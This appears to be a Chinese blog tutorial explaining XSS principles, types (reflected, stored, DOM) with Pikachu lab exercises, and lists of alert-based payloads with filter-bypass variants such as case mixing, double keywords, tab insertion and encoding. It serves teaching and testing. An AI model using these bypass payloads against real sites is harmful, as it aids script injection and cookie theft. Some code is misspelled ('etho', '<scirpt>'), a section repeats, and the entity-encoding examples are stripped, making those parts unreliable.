XSS漏洞及其原理
1、XSS漏洞原理
1.概述
XSS被称为跨站脚本攻击(Cross Site Scripting),由于和层叠样式表(Cascading Style Sheets,CSS)重名,改为XSS。
主要基于JavaScript语言进行恶意攻击,因为js非常灵活操作html、css、浏览器。
2.利用方式
利用网页开发时web应用程序对用户输入过滤不足导致将恶意代码注入到网页中,使用户浏览器加载并执行恶意代码,通常是JavaScript类型,也包括java、vbs、flash、html等。
3.执行方式
用户浏览被XSS注入过的网页,浏览器就会解析这段代码,就被攻击了。因为浏览器当中有JavaScript解析器,浏览器不会判断代码是否恶意,只要符合语法规则,就直接解析了。
4.攻击对象
客户端攻击,对象大多为用户,网站管理员。
还有微博,网页留言板,聊天室等收集用户输入的地方
5.XSS危害
(1)窃取cookie
因为大部分人喜欢将密码储存到浏览器当中,所以黑客一般渗透的时候就会先来浏览器查看已保存的cookie 来盗取各种用户账号
前面文章也提到预防xss一种方法 (传送门)
(2)未授权操作
js特性很强大,黑客会直接代替用户在html进行各类操作。比如劫持会话,刷流量,执行弹窗广告,还能记录用户的键盘输入。
(3)传播蠕虫病毒
6.简单代码
<?php
$input = $_GET["XSS"];
etho "<div>".$input."</div>";
?>
7.xss验证
当在测试页面上提交以下代码,浏览器执行之后会出现弹窗,这是为了验证js代码是否被执行,代码被当做字符串输出在HTML页面上,浏览器当中的JavaScript解析器会根据
JavaScript的三种弹出提示框
<scirpt>alert(/xss/)</script>
#alert()方法是显示一条弹出提示消息和确认按钮的警告框。需要注意的是 :alert()是一个阻塞的函数,如果我们不点确认按钮,后面的内容就不会加载出来。
<scirpt>confirm('xss')</script>
#confirm()方法是显示一个含有指定消息和确认和取消按钮的确认框。如果点击"确定"返回true,否则返回false
<scirpt>prompt("xss")</script>
#prompt()方法是显示提示用户进行输入的对话框。这个方法返回的是用户输入的字符串。
2.xss漏洞分类
1.反射型XSS
非持久型XSS,最容易出现的XSS漏洞。
原理
用户在请求某个URL地址时,会携带一部分数据。当客户端进行访问某条链接时,攻击者可以将恶意代码注入到URL,如果服务器端未对URL携带的参数做判断和过滤,直接返回响应页面,那么XSS攻击代码就会被一起传输到用户的浏览器,触发反射型XSS。
特点
非持久性
参数脚本
js代码在web应用的参数当中:搜索框
数据流量:浏览器---->后端---->浏览器
pikachu靶场例题
2.存储型xss
原理
被保存到服务器上,显示到HTML页面中,经常出现在用户评论的页面,攻击者将XSS代码保存到数据库中,当用户在此访问这个页面时,就会触发并执行XSS代码,窃取用户的敏感信息。
特点
危害性最大:持久的保存在服务器上
持久型XSS
js代码不在某个参数中,而是被写进了数据库或文件可以永久保存数据的介质中,如留言板等。
数据流量走向:浏览器—>后端—>数据库—>后端—>浏览器
pikachu例题
直接在留言版上输入xss代码
3.DOM型xss
原理
基于文档对象模型(DOM)的一种漏洞。这种XSS与反射型XSS、存储型XSS有着本质的区别,它的攻击代码不需要服务器解析响应,触发XSS依靠浏览器端的DOM解析,客户端的JavaScript脚本可以访问浏览器的DOM并修改页面的内容,不依赖服务器的数据,直接从浏览器端获取数据并执行。
特点
非持久性
数据流量:URL—>浏览器
以下是一些经常出现dom xss的关键语句
document.referer属性
window.name属性
location属性
innerHTML属性
document.write属性
pikachu列题
解1
文档对象传入xss代码参数然后操作文档对象时就会触发xss攻击
解2
3.xss payload构造及变形
1.payload构造
1.利用伪协议(HTML标签的属性值)
<a href="javascript:alert(/xss/)">touch me !< /a>
<img src="javascript:alert('xss')"> #需在IE6测试
2.利用事件
<img src='./smile.jpg'onmouseover='alert(/xss/)'>
<input type="text" onclick="alert(/xss/)">
3.利用CSS
行内样式
<div style="background-image:url(javascript:alert(/xss/))">
页内样式
<style>Body{background-image:url(javascript:alert(/xss/))}</style>
4.利用【<>】构造HTML标签和标签
<h1 style="color:green;">XSS</h1>
<script>alert(/xss/)</script>
2.payload变形
1.大小写
<iMg sRc='#'Onerror="alert(/xss/)"/>
<a hREf="javaScript:alert(/xss/)">click me </a>
2.双关键字
<scrscript>alert(/xss/)</scrscript>
3.【/】代替空格
<img/src='#'onerror='alert(/xss/)'/>
4.引号
在js当中可以用反引号代替单双引号,在HTML种就不需要。
<img src="#"onerror="alert(/xss/)"/>
<img src='#'onerror='alert(/xss/)'/>
<img src=# onerror=alert(/xss/)/>
<img src="#"onerror=alert('xss')/>
<img src="#"onerror=alert'xss'/>
5.Tab与空格
在一些位置添加Tab(水平制表符)和回车符来绕过关键字检测
<img src='#'onerror ='alert(/xss/)'/>
<a href="j avascript:alert(/xss/)">click me!</a>
<A href="j
avascript:alert(/xss/)">click me!</a>
6.编码
URL编码
%3Cscript%3Ealert(/xss/)%3C/script%3E
HTML实体编码
a 97
(a) “7”后面还有美式分号“;”
= “1”后面还有美式分号“;”
<a href="javascript:alert(/xss/)">click me!</a>
avascript:alert(/xss/)">click me!
#### 6.编码
URL编码
%3Cscript%3Ealert(/xss/)%3C/script%3E
HTML实体编码
a 97
(a) “7”后面还有美式分号“;”
= “1”后面还有美式分号“;”
```javascript
<a href="javascript:alert(/xss/)">click me!</a>
扫一扫
1015
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
